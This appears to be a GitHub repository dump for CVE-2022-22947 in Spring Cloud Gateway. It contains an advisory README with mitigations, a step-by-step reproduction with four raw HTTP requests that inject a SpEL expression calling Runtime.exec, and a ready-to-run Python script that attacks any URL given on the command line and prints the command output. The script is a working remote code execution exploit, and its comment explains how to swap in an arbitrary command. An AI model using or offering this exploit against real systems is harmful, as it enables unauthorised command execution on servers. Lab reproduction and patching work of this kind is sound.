[
  {
    "path": "README.md",
    "content": "# Spring-Cloud-Gateway-CVE-2022-22947\n\nSecurity advisory for the Spring Cloud Gateway remote code execution vulnerability. When Spring Cloud Gateway has the Gateway Actuator endpoint enabled and exposed, applications using Spring Cloud Gateway are vulnerable to code injection: an attacker can send a specially crafted malicious request and execute arbitrary code remotely.\n\n[Affected versions]\n\nSpring Cloud Gateway < 3.1.1\nSpring Cloud Gateway < 3.0.7\nOlder, unsupported versions of Spring Cloud Gateway are also affected\n\n[Fixed versions]\n\nSpring Cloud Gateway >= 3.1.1\nSpring Cloud Gateway >= 3.0.7\n\nSpring Cloud Gateway is an API gateway built on Spring Framework and Spring Boot; it aims to give microservice architectures a simple, effective and unified way to manage API routing.\n\n## Remediation\n\nTemporary mitigation:\n\nIf the gateway actuator endpoint is not needed, disable it with management.endpoint.gateway.enabled: false. If the actuator is required, protect it with Spring Security; see https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html#actuator.endpoints.security.\n\nGeneral fix:\n\nFixed versions have been released upstream; download and update promptly from https://github.com/spring-cloud/spring-cloud-gateway\n\n## Attacking via URL\n\nRun with python3\n\n<img width=\"831\" alt=\"image\" src=\"https://user-images.githubusercontent.com/59011386/156518437-ee1cbd8c-133a-4b4b-97af-8c0df6ab6538.png\">\n\npython3 \n\n<img width=\"799\" alt=\"image\" src=\"https://user-images.githubusercontent.com/59011386/156515667-64f5c639-7a78-43c6-8414-18631f9c5272.png\">\n\n# The information provided here is for reference only\n\n"
  },
  {
    "path": "Spring Cloud Gateway Actuator API SpEL表达式注入命令执行（CVE-2022-22947）.md",
    "content": "# Spring Cloud Gateway Actuator API SpEL Expression Injection Command Execution (CVE-2022-22947)\n\nSpring Cloud Gateway is an API gateway in the Spring ecosystem. Versions up to and including 3.1.0 and 3.0.6 contain a SpEL expression injection vulnerability; when an attacker can reach the Actuator API, the flaw can be used to execute arbitrary commands.\n\nReferences:\n\n- https://tanzu.vmware.com/security/cve-2022-22947\n- https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/\n\n## Vulnerable environment\n\nRun the following command to start a web service that uses Spring Cloud Gateway 3.1.0:\n\n```\ndocker-compose up -d\n```\n\nOnce the service is up, visit `http://your-ip:8080` to see the demo page; its upstream is example.com.\n\n## Reproducing the vulnerability\n\nExploiting this vulnerability takes several steps.\n\nFirst, send the following request to add a route containing a malicious SpEL expression:\n\n```\nPOST /actuator/gateway/routes/hacktest HTTP/1.1\nHost: localhost:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\nConnection: close\nContent-Type: application/json\nContent-Length: 328\n\n{\n  \"id\": \"hacktest\",\n  \"filters\": [{\n    \"name\": \"AddResponseHeader\",\n    \"args\": {\"name\": \"Result\",\"value\": \"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"id\\\"}).getInputStream()))}\"}\n  }],\n\"uri\": \"http://example.com\",\n\"order\": 0\n}\n```\n\n[![img](https://github.com/vulhub/vulhub/raw/master/spring/CVE-2022-22947/1.png)](https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/1.png)\n\nNext, send the following request to apply the route just added. This request triggers evaluation of the SpEL expression:\n\n```\nPOST /actuator/gateway/refresh HTTP/1.1\nHost: localhost:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n```\n\n[![img](https://github.com/vulhub/vulhub/raw/master/spring/CVE-2022-22947/2.png)](https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/2.png)\n\nSend the following request to view the execution result:\n\n```\nGET /actuator/gateway/routes/hacktest HTTP/1.1\nHost: localhost:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n```\n\n[![img](https://github.com/vulhub/vulhub/raw/master/spring/CVE-2022-22947/3.png)](https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/3.png)\n\nFinally, send the following request to clean up by deleting the route that was added:\n\n```\nDELETE /actuator/gateway/routes/hacktest HTTP/1.1\nHost: localhost:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\nConnection: close\n```\n\n[![img](https://github.com/vulhub/vulhub/raw/master/spring/CVE-2022-22947/4.png)](https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/4.png)"
  },
  {
    "path": "spring_cloud_RCE.py",
    "content": "import requests\nimport sys\n\n\ndef run(url):\n\n    headers1 = {\n        'Accept-Encoding': 'gzip, deflate',\n        'Accept': '*/*',\n        'Accept-Language': 'en',\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',\n        'Content-Type': 'application/json'\n    }\n\n    headers2 = {\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',\n        'Content-Type': 'application/x-www-form-urlencoded'\n    }\n\n    # command to execute: replace \"id\" in the payload\n\n    payload = '''{\\r\n      \"id\": \"hacktest\",\\r\n      \"filters\": [{\\r\n        \"name\": \"AddResponseHeader\",\\r\n        \"args\": {\"name\": \"Result\",\"value\": \"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\\\"id\\\\\"}).getInputStream()))}\"}\\r\n        }],\\r\n      \"uri\": \"http://example.com\",\\r\n      \"order\": 0\\r\n    }'''\n\n    # 1. add the route (the payload is already a JSON string, so it is sent as raw body data)\n    re1 = requests.post(url=url + \"/actuator/gateway/routes/hacktest\", data=payload, headers=headers1)\n    # 2. refresh routes so the new route is applied\n    re2 = requests.post(url=url + \"/actuator/gateway/refresh\", headers=headers2)\n    # 3. read back the route to see the result\n    re3 = requests.get(url=url + \"/actuator/gateway/routes/hacktest\", headers=headers2)\n    # 4. delete the route and refresh again to clean up\n    re4 = requests.delete(url=url + \"/actuator/gateway/routes/hacktest\", headers=headers2)\n    re5 = requests.post(url=url + \"/actuator/gateway/refresh\", headers=headers2)\n    print(re3.text)\n\n\nif __name__ == \"__main__\":\n    print('''   ██████  ██      ██ ████████        ████   ████   ████   ████         ████   ████   ████     ██  ██████\n  ██░░░░██░██     ░██░██░░░░░        █░░░ █ █░░░██ █░░░ █ █░░░ █       █░░░ █ █░░░ █ █░░░ █   █░█ ░░░░░░█\n ██    ░░ ░██     ░██░██            ░    ░█░█  █░█░    ░█░    ░█      ░    ░█░    ░█░█   ░█  █ ░█      ░█\n░██       ░░██    ██ ░███████  █████   ███ ░█ █ ░█   ███    ███  █████   ███    ███ ░ ████  ██████     █ \n░██        ░░██  ██  ░██░░░░  ░░░░░   █░░  ░██  ░█  █░░    █░░  ░░░░░   █░░    █░░   ░░░█  ░░░░░█     █  \n░░██    ██  ░░████   ░██             █     ░█   ░█ █      █            █      █        █       ░█    █   \n ░░██████    ░░██    ░████████      ░██████░ ████ ░██████░██████      ░██████░██████  █        ░█   █    \n  ░░░░░░      ░░     ░░░░░░░░       ░░░░░░  ░░░░  ░░░░░░ ░░░░░░       ░░░░░░ ░░░░░░  ░         ░   ░     \n\n\n\n ██                   ██                 ██                              \n░██       ██   ██    ░██                ░██                              \n░██      ░░██ ██     ░██ ██   ██  █████ ░██  ██  ██████  ███████   █████ \n░██████   ░░███      ░██░██  ░██ ██░░░██░██ ██  ██░░░░██░░██░░░██ ██░░░██\n░██░░░██   ░██    ██ ░██░██  ░██░██  ░░ ░████  ░██   ░██ ░██  ░██░███████\n░██  ░██   ██    ░░  ░██░██  ░██░██   ██░██░██ ░██   ░██ ░██  ░██░██░░░░ \n░██████   ██      ██ ███░░██████░░█████ ░██░░██░░██████  ███  ░██░░██████\n░░░░░    ░░      ░░ ░░░  ░░░░░░  ░░░░░  ░░  ░░  ░░░░░░  ░░░   ░░  ░░░░░░ \n\nusage: python3 spring_cloud_RCE.py url\n''')\n    if len(sys.argv) > 1:\n        url = sys.argv[1]\n        run(url)\n    else:\n        sys.exit(1)\n"
  }
]